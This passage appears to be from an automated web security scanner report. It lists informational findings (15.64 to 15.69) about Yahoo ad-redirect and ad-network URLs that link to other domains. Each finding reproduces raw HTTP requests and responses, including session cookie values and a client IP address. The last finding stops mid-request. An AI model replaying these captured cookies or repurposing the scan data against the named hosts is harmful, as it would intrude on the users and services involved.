GET /SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F HTTP/1.1
Host: global.ard.yahoo.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:38 GMT
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F
Connection: close
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F">here</A>
...[SNIP]...

15.64. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://global.ard.yahoo.com
Path:   /SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; the relevant line is shown in the response excerpt below.

Request

GET /SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA HTTP/1.1
Host: global.ard.yahoo.com
Proxy-Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:31 GMT
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA
Connection: close
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA">here</A>
...[SNIP]...

15.65. http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://global.ard.yahoo.com
Path:   /SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; the relevant line is shown in the response excerpt below.

Request

GET /SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click;h=v2%7C3D5D%7C0%7C0%7C%2a%7Ct;234260563;0-0;0;58130593;31-1%7C1;39902686%7C39920473%7C1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F HTTP/1.1
Host: global.ard.yahoo.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:35 GMT
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://ad.doubleclick.net/click;h=v2%7C3D5D%7C0%7C0%7C%2a%7Ct;234260563;0-0;0;58130593;31-1%7C1;39902686%7C39920473%7C1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F
Connection: close
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://ad.doubleclick.net/click;h=v2%7C3D5D%7C0%7C0%7C%2a%7Ct;234260563;0-0;0;58130593;31-1%7C1;39902686%7C39920473%7C1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F">here</A>
...[SNIP]...

15.66. http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://global.ard.yahoo.com
Path:   /SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; the relevant line is shown in the response excerpt below.

Request

GET /SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk?sa=L&ai=BaZK2kBZmTqqeLY2YjQSIjaSeBwAAAAAQASAAOABQ--WT1wVYq9PzFGDJ1vqGyKOgGYIBCWNhLWdvb2dsZbIBEWZpbmFuY2UueWFob28uY29tyAEJ2gGWAWh0dHA6Ly9maW5hbmNlLnlhaG9vLmNvbS9xO195bHQ9QXNqcWtvVkltWGNnY3JXQUVhQzdPTGJ4VmF4XztfeWx1PVgzb0RNVEZoWnpkcE5XUmpCSEJ2Y3dNeE1nUnpaV01EZVdacFUzbHRZbTlzVEc5dmEzVndVbVZ6ZFd4MGN3UnpiR3NEZUhOelpnLS0_cz1YU1MuRsACAqgDAdgEgK3iBOAEApoFGAj4ozYQ8eSyHxiVj-hwIKvT8xQokeucAaAGHw&num=0&sig=AOD64_0VY0xIBePsVX8cVgiDrhGM37PyFQ&client=&adurl=http://pixel.everesttech.net/2565/c%3Fev_ct%3Dd%26ev_sid%3D54%26ev_ci%3D1660002714%26ev_ai%3D1660082513%26ev_cri%3D1660643811%26url%3Dhttp%253A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%253Futm_source%253Dyhofin%2526utm_medium%253Dpaid-banner-ads%2526utm_campaign%253D120x60-QuotesBttn%2526utm_content%253Dstock%253AoldGrnBlk HTTP/1.1
Host: global.ard.yahoo.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:33 GMT
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://adclick.g.doubleclick.net/aclk?sa=L&ai=BaZK2kBZmTqqeLY2YjQSIjaSeBwAAAAAQASAAOABQ--WT1wVYq9PzFGDJ1vqGyKOgGYIBCWNhLWdvb2dsZbIBEWZpbmFuY2UueWFob28uY29tyAEJ2gGWAWh0dHA6Ly9maW5hbmNlLnlhaG9vLmNvbS9xO195bHQ9QXNqcWtvVkltWGNnY3JXQUVhQzdPTGJ4VmF4XztfeWx1PVgzb0RNVEZoWnpkcE5XUmpCSEJ2Y3dNeE1nUnpaV01EZVdacFUzbHRZbTlzVEc5dmEzVndVbVZ6ZFd4MGN3UnpiR3NEZUhOelpnLS0_cz1YU1MuRsACAqgDAdgEgK3iBOAEApoFGAj4ozYQ8eSyHxiVj-hwIKvT8xQokeucAaAGHw&num=0&sig=AOD64_0VY0xIBePsVX8cVgiDrhGM37PyFQ&client=&adurl=http://pixel.everesttech.net/2565/c%3Fev_ct%3Dd%26ev_sid%3D54%26ev_ci%3D1660002714%26ev_ai%3D1660082513%26ev_cri%3D1660643811%26url%3Dhttp%253A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%253Futm_source%253Dyhofin%2526utm_medium%253Dpaid-banner-ads%2526utm_campaign%253D120x60-QuotesBttn%2526utm_content%253Dstock%253AoldGrnBlk
Connection: close
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://adclick.g.doubleclick.net/aclk?sa=L&amp;ai=BaZK2kBZmTqqeLY2YjQSIjaSeBwAAAAAQASAAOABQ--WT1wVYq9PzFGDJ1vqGyKOgGYIBCWNhLWdvb2dsZbIBEWZpbmFuY2UueWFob28uY29tyAEJ2gGWAWh0dHA6Ly9maW5hbmNlLnlhaG9vLmNvbS9xO195bHQ9QXNqcWtvVkltWGNnY3JXQUVhQzdPTGJ4VmF4XztfeWx1PVgzb0RNVEZoWnpkcE5XUmpCSEJ2Y3dNeE1nUnpaV01EZVdacFUzbHRZbTlzVEc5dmEzVndVbVZ6ZFd4MGN3UnpiR3NEZUhOelpnLS0_cz1YU1MuRsACAqgDAdgEgK3iBOAEApoFGAj4ozYQ8eSyHxiVj-hwIKvT8xQokeucAaAGHw&amp;num=0&amp;sig=AOD64_0VY0xIBePsVX8cVgiDrhGM37PyFQ&amp;client=&amp;adurl=http://pixel.everesttech.net/2565/c%3Fev_ct%3Dd%26ev_sid%3D54%26ev_ci%3D1660002714%26ev_ai%3D1660082513%26ev_cri%3D1660643811%26url%3Dhttp%253A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%253Futm_source%253Dyhofin%2526utm_medium%253Dpaid-banner-ads%2526utm_campaign%253D120x60-QuotesBttn%2526utm_content%253Dstock%253AoldGrnBlk">here</A>
...[SNIP]...

15.67. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant lines are shown in the response excerpt below.

Request

GET /seg?add=155746&redir=${SEG_IDS}&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 12:46:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 12:46:03 GMT
Content-Length: 456

document.write('<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=52987;sz=1x1;ord=1?" width="1" height="1"/>');document.write('<img src="http://b.scorecardresearch.com/b?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15=&cv=1.3&cj=1" width="1" height="1"/>');document.write('<img src="http://tags.bluekai.com/site/4378" width="1" height="1"/>');document.write('<scr'+'ipt type="text/javascript" src="${SEG_IDS}">
...[SNIP]...

15.68. http://ib.adnxs.com/ttj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; the relevant line is shown in the response excerpt below.

Request

GET /ttj?id=563719&cb=0.8985232759732753&pubclick=http://optimized-by.rubiconproject.com/t/6348/9844/16043-15.3218925.3243961?url= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 12:46:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 12:46:00 GMT
Content-Length: 2659

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2;sz=300x250;pc=[TPAS_ID];click0=http://ib.adnxs.com/click?AAAAAAAACEAAAAAAAAAIQAAAAEA3CRVAAAAAAAAACEAAAAA
...[SNIP]...
</scr'+'ipt><iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

15.69. http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant lines are shown in the response excerpt below.

Request

GET /j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
